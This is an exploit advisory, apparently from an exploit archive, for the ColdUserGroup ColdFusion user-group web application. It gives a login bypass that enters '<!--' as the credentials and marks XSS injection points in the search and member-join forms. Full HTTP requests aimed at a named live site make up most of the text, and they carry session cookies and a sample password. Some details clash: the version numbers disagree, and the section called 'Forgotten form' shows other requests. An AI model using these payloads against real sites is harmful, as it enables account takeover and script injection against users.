#**********************************************************
# Exploit Title: ColdUserGroup - Version 1.6 bypass/XSS Vulnerabilities
# Date: 09/09/2010
# Author: Sangteamtham
# Software Link: http://www.coldgen.com/index.cfm?ColdGen=ProductDetails&ProductID=8
# Version: 1.22
# Tested on: Windows 7
#
#***********************************************************

1.Description:
Built using Fusebox and adhering to CSS/XHTML standards the ColdUserGroup application is intended to allow a quickstart to hosting your own user group web site. Currently in live use at www.actcfug.com. Some of the features in use on the live site have been removed but can be easily integrated (ie: Google Calendar). This new version now utilises FCKEditor as the rich text editor, rather than the original ActivEdit

2. Exploit

2.a: bypass login

http://site.com/index.cfm?actcfug=MemberLoginForm

User Name:<!--
Password :<!--

2.b: XSS vul:

In Search Form and register form, the vendor does not filter the special characters.So attackers will put the malicious code into that form. 

3. Poc:

Victim: http://victim.com/index.cfm


3.a. Login form:

I found it work just in opera Version 10.61 only

3.b. Forgotten form:

3.b.1:

http://site.com/index.cfm?fuseaction=LookupPassword

+Header:

Host: www.site.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.actcfug.com/index.cfm?actcfug=SearchSite
Cookie: CFID=974979; CFTOKEN=59397041; __utma=125918109.619983113.1284030540.1284030540.1284033833.2; __utmz=125918109.1284030540.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=8430f8fc4fd40c79c0eba2e6d59e557c2e4a; __utmc=125918109; __utmb=125918109


+ Post data:

Content-type: application/x-www-form-urlencoded\r\n
Content-length: 99\r\n
\r\n
SubmitForm=Search%20Site&Keywords=[XSS here]&Category=Articles

3.b.2:

Header:

Host: www.actcfug.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.actcfug.com/index.cfm?actcfug=MemberJoin
Cookie: CFID=974979; CFTOKEN=59397041; __utma=125918109.619983113.1284030540.1284030540.1284033833.2; __utmz=125918109.1284030540.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=8430f8fc4fd40c79c0eba2e6d59e557c2e4a; __utmc=125918109; __utmb=125918109
 
Post data:
Content-type: application/x-www-form-urlencoded\r\n
Content-length: 419\r\n
\r\n
Join=%20%20%20Join%20the%20ACTCFUG%20%20%20&UserName=sangte&UserPassword=123456&ConfirmPassword=123456&UserFirstName=[XSS HERE]&UserLastName=amtham&UserEmailAddress=sangte%40ok%2Ecom&Newsletter=true&EmailAccount=false


4. Patch:

Vender should filter the special characters when input the form.

5. Credits:
Thanks flying to Vietnamese hackers and all hackers out there researching for more security.
*************************************************************